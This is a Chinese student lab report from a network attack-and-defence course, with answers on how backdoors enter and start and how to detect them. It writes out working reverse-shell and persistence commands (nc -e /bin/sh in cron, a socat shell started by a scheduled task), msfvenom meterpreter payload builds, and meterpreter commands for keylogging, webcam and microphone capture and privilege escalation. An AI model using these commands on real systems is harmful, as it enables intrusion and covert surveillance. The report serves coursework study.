20212324 2023-2024-2 《网络与系统攻防技术》实验二实验报告

20212324晋博 2024-04-03 22:10:22

20212324晋博 2023-2024-2 《网络与系统攻防技术》实验二实验报告

目录

  • 20212324晋博 2023-2024-2 《网络与系统攻防技术》实验二实验报告
  • 1.实验内容
  • 2.问题回答
  • (1)例举你能想到的一个后门进入到你系统中的可能方式?
  • (2)例举你知道的后门如何启动起来(win及linux)的方式?
  • (3)Meterpreter有哪些给你映像深刻的功能?
  • (4)如何发现自己有系统有没有被安装后门?
  • 3.实验入侵过程
  • (一)使用netcat获取主机操作Shell,cron启动
  • 1.入侵思路:
  • 2.入侵过程:
  • (二)使用socat获取主机操作Shell, 任务计划启动
  • 1.入侵思路:
  • 2.入侵过程:
  • (三)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
  • 1.入侵思路:
  • 2.入侵过程
  • (四)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
  • 1.入侵思路:
  • 2.入侵过程:
  • (五)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
  • 1.入侵思路:
  • 2.入侵过程:
  • 4.问题及解决方案
  • 5.学习感悟和思考
  • 参考资料

1.实验内容

  • 本周学习内容:

    • 继续学习了第二章:缓冲区溢出的相关内容——shellcode,其中包含三种模式、三种栈溢出的方法以及防范栈溢出的方法;
    • 实验后第二周引入了本次实验内容:后门的原理、主要分类及部分案例,通过实验,我对于后门的原理有了一定了解,上课时更加有效率。
  • 本次实验内容:

    • 使用netcat获取主机操作Shell,cron启动

    • 使用socat获取主机操作Shell, 任务计划启动

    • 使用MSF meterpreter 生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    • 使用MSF meterpreter 生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    • 使用MSF生成shellcode 注入到实践1中的pwn1中,获取反弹连接Shell

  • 实验目的

    • 了解网络后门的原理与危害。

    • 学会使用 netcat 、socat 获取主机 shell

    • 理解 TCP 反弹 shell 的原理

    • 初步掌握 metasploit 的使用

2.问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 下载一些来源不明软件时,会安装其他捆绑软件,其中可能存在盗取系统权限后开辟后门的软件
  • SSH弱口令。不少机器都是开了SSH远程登录的,通过弱口令爆破后远程连接主机。
  • 主动插入带毒的U盘,或者被迫(悄悄)插入带毒的U盘

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 我了解的有被入侵机器自动连接入侵者和入侵者远程连接被入侵机器并启动两种
  • windows
    • 开机自启动
    • 注册表启动
    • 定时任务管理器
    • 配合其他漏洞,如远程命令执行
    • 网站直接访问。比如已经成功写入了PHP的一句话木马,直接访问就可以了,菜刀蚁剑也可以。
  • linux

    • cron定时任务

    • 运行带后门的程序

    • 配合其他漏洞,如远程命令执行

(3)Meterpreter有哪些给你映像深刻的功能?

  • 可以针对不同平台主机生成相应的shellcode完成攻击
  • 命令通俗易懂、高度集成,方便入侵者使用

(4)如何发现自己有系统有没有被安装后门?

  • 杀毒软件可扫描后台和文件检查恶意后门程序(由于实验不是一天完成的,每次重启后电脑的杀毒软件都会将之前完成的后门程序删除)
  • 检查系统启动项,防范被恶意写入自动执行任务
  • 检查异常开启的端口
  • 系统莫名其妙地出现异常、风扇异常响起、内存突然增加(本次实验后,我忘了关windows的定时任务,第二天弹窗吓了我一跳)

3.实验入侵过程

(一)使用netcat获取主机操作Shell,cron启动

1.入侵思路:

  • 入侵者持续监听2324 端口后等待被入侵主机连接

  • 被入侵主机 cron 添加定时任务,定时反向连接入侵者的2324端口

2.入侵过程:

  • 入侵者 Windows 10 IP :172.20.10.13

  • 被入侵主机 Kali IP :172.20.10.2

  • windows 使用natcat监听2324端口

ncat.exe -l -p 2324

img

  • kali 使用nc命令测试连通性
nc 172.20.10.13 2324 -e /bin/sh
  • kali添加定时任务,执行nc命令,连接windows入侵者
    • crontab如果要远程写入的话不能直接crontab -e,需要通过管道写入
    • 这里我的命令选择的是:
* * * * * nc 172.20.10.13 2324 -e /bin/sh
//能够在每分钟自启动一次

img

  • windows用ncat监听2324端口,等待每分钟,被入侵主机kali主动连接自己
    • 这个入侵过程可以先输入一个命令,当被入侵主机连接上了以后命令就会显示在cmd上,方便查看

img

(二)使用socat获取主机操作Shell, 任务计划启动

1.入侵思路:

  • 入侵者kali使用socat监听2324端口

  • 被入侵主机windows在任务启动计划中添加定时任务,定时主动连接kali的2324端口

2.入侵过程:

  • windows添加定时任务,主动连接入侵者kali
在系统工具中,找到任务计划程序,点击右侧的创建任务

常规设置:任务名
触发器:定时每天的1104触发,每隔1分钟重复一次
操作:设置成启动程序: G:\文件\socat\socat.exe
     参数:tcp-listen:2324 exec:cmd.exe,pty,stderr

img

img

img

  • kali监听2324端口,等待windows的主动连接

  • 任务成功启动,能够在任务管理器和系统弹窗中发现socat.exe成功启动

img

  • kali已经可以通过后门执行win上面的cmd

img

(三)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.入侵思路:

  • kali 创建 20212324_backdoor.exe 并使用 msfvenom 植入反弹shell的后门

  • kali ncat 监听,将毒化后的20212324_backdoor.exe 发送给连接者 Windows

  • kali 进入msfconsole控制台,配置相关端口并监听端口,等待Win11运行有毒的 20212324_backdoor.exe 连接自己,获得shell

2.入侵过程

  • kali生成毒化的2324hack.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=2324-f exe > 20212324Jinbo_backdoor.exe

img

  • kali把有毒的20212324Jinbo_backdoor.exe 传回给windows
nc 172.20.10.13 2324 < 20212324Jinbo_backdoor.exe

ncat.exe -lv 2324 > 20212324Jinbo_backdoor.exe 

img

img

  • kali进入msf控制台,对msfconsole进行配置准备监听来自windows的反弹shell连接
    • 主要配置入侵的平台、方式,本机ip及端口

img

  • windows运行带有后门的程序,kali msfconsole获得console

img

(四)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.入侵思路:

  • 在上一步攻击成功的基础上,获得主机shell之后,使用相应指令,即可完成录音、摄像头、击键记录、截屏等功能

  • 在获得主机shell的基础上,POST模块提权。

2.入侵过程:

  • 获取 录音、摄像头、击键记录、截屏
record_mic           //录音

webcam_snap          //用摄像头拍照

screenshot           //获取截屏
    
keyscan_start        //开始记录键盘
keyscan_stop         //停止记录键盘
keyscan_dump         //显示捕获到的键盘记录

img

img

img

img

img

  • 可以看到,调用摄像头时笔记本的提示灯亮起,从这个角度来说能够一定程度上保障安全
  • POST 模块提权
    • 通过getsystem、getuid尝试
getsystem          //报错了,后续通过以管理员身份运行,以这样给予程序较高的权限方式,实现了提权

getuid

img

img

(五)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

1.入侵思路:

  • 生成用于kali平台的shellcode
  • MSF监听
  • 注入pwn1,反弹shell
  • 通过另外的命令窗口尝试“自己攻击自己”,模拟攻击结果

2.入侵过程:

  • 由于两台机子之间的入侵和获取shell已经做过,本次图省事直接“自己攻击自己”
  • 复制实验一的20212324pwn1,使用msfvenom生成shellcode注入20212324pwn2
    • 找到对应平台合适的payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=2324 -x /home/20212324Jinbo/Desktop/Exp2/20212324pwn1 -f -lf > 20212324pwn2

img

  • 修改msfconsole配置后开始监听,并在本机另一个命令窗口执行20212324pwn2文件,可以看到shell已经被获取

img

img

4.问题及解决方案

  • 问题1:在进行 1.使用netcat获取主机操作Shell,cron启动 时,一开始我想通过crontab -e直接编辑cron,但出现了vim的警告:输入输出不是命令终端。且该方式看不到kaliTerminal返回的提示,不太好用。

img

问题1解决方案:通过实验一中学习的管道进行输入,能够避免上述错误。

  • 问题2:在进行4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 时,提权入侵过程中系统返回提权失败。

    问题2解决方案:该问题主要是因为socat.exe运行时权限不够,相关操作被windows视为越权。因此最简单的方法是通过管理员身份运行该程序;同时,实验入侵过程中我也参考了网上其他学长学姐的博客,了解到了一些其他方式,如通过shell添加用户等,对相关知识有了更加丰富和深入的了解。

5.学习感悟和思考

  • 本次实验不论是数量上还是难度上,都较上次实验提高了不少。首先是实验涉及的内容是课程没有上过的内容,实验即相当于实践和预习;其次是实验和自己知识储备关联较少。第一、二个实验和之前涉及的实验还稍微有一些关联、和自己所了解的计算机知识也有一定关系,故做起来还可以;但到了后面的三个实验,就很容易不了解每一步的意义、网上也难以搜索到相关的解决方法。
  • 但在这样较为“困难”的条件下,通过对于老师视频的观看和学习,加之有效运用老师上课说的排查问题和检索报错的方法,实验还是“有惊无险”地完成!
  • 实践,实践,还是实践:首先,必须明确目标,确保每次实验都有明确的学习点和预期成果而非囫囵吞枣。唯有如此,我们才能知道自己到底在干什么,从而才能获得更多对于实验的思考和收获。
  • 持续学习的重要性:每次实验涉及的板块是分开的,但并不代表这样就可以捡芝麻丢西瓜,而是要循序渐进,逐渐深入、融会贯通。

参考资料

...全文
69 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
网络信息安全综合实验 任 务 书 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 二、 主要内容 实验一加密认证通信系统实现 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 实验二 综合扫描及安全评估 利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出 全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从 而提高系统的安全性能。 实验网络攻防技术 矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够 的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地 解决各种威胁。 实验四 Windows系统安全配置方案 作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往 忽视了OS的安全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方 面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此 ,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵 检测软件来加强系统的安全。 其中实验一要求编程实现,可直接调用相关功能函数完成。实验二至实验四可在机房 的网络信息安全综合实验系统上完成。 三、 进度计划 "序号 "设计(实验)内容 "完成时间 "备注 " "1 "接受任务,查阅文献,开始实 "第一天 " " " "现密码算法和认证算法 " " " "2 "完成加密认证通信系统 "第二至七天 " " "3 "上午完成综合扫描及安全评估 "第八天 " " " "实验,下午进行网络攻防实验 " " " "4 "上午完成网络攻防实验,下午 "第九天 " " " "进行系统安全配置实验 " " " "5 "撰写实验报告并验收 "第十天 " " 四、 实验成果要求 1. 要求程序能正常运行,并实现任务书要求功能。 2. 完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重 对设计思路的归纳和对问题解决过程的总结。 五、 考核方式 平时成绩+程序验收+实验报告。 学生姓名: 指导教师: 2016 年 6 月 13 日 实验报告 题 目: 网络信息安全综合实验 院 系:计算机系 班 级: 学 号: 学生姓名: 指导教师: 成 绩: 实验日期:2021 年 6 月 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 二、 实验内容 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 三、实验结果 实验一:本通信系统为用C#语言编写的P2P方式通信的系统,其具体功能如下: 1、识别本机IP地址并赋值到文本框中,产生一个随机数作为端口号,端口号范围限制在 1000到65535之间。 2、通过运用网络编程的知识尝试用产生的IP与端口号进行监听。 图1 发送方界面 图2 接收方界面 3、设置刷新区域,定时刷新好友在线,可以设置刷新间隔,启动和停止刷新。这里 可以通过拖拽VS里自带的控件"timersecond",实现计时。 4、发送消息。消息的传送是具有加密与认证的。 加密:考虑到DES的安全性问题,加密消息是采用AES方式加密的,本系统采用的是 C#封装好的AES程序,调用接口,实现对明文的加密。解密同理。 认证:认证是将明文哈希散列后采用RSA算法对其进行签名,再用公钥加密进行认证 的,其中哈希散列采用的是SHA1方式。下图为加密与认证的具体流程。 图3 加密与认证流程 图4 发送方可显示明文与密文 图5接收方解密出明文 5、可以发送文件。通过获取文本框中的文件地址,建立文件流,向接收端发送文件 。 接收端进行文件监听,接收文件,与发送文件编写过程相似,只是把"写"换成了"读"文 件。VS里自带的控件"saveFileDialog"可以帮助用户提示选择保存文件的位置。 图6 输入文件位置 图7 询问是否接受文件 图8 接收与发送文件成功 实验二:认识性实验实验为认识练习信息安全实验平台的部分实验。 SuperScan端口扫描实验 扫描结果如下图: 图

92

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧